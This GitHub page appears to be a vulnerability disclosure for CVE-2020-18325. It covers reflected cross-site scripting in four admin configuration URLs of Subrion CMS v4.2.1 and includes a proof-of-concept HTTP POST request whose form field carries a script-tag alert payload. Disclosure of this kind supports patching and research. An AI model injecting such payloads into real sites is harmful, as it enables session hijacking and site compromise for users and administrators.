Skip to content

hamm0nz/CVE-2020-18325

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Multilple Cross Site Scripting (XSS) vulnerability exists in Intelliants Subrion CMS v4.2.1 in the Configuration panel.

Description

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites.

Multiple Reflected Cross-site Scripting vulnerabilities were discovered in the Subrion CMS v.4.2.1 configuration panel, allowing a remote attacker to inject arbitrary JavaScript.

Date: 27-02-2022
Software Link: https://subrion.org
Exploit Author: HaMM0nz
CVE: CVE-2020-18325
Category: Web Application
Affected URL

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

Proof of Concept

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1

-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test"><script>alert(1)</script>1qazx

Timeline

Discovery and report : 24 June 2019
CVE ID was assigned : 11 Aug 2021
Public : 27 February 2022

Solution

Consider complying to the OWASP's XSS prevention guidelines. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

About

Exploit PoC for CVE-2020-18325

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published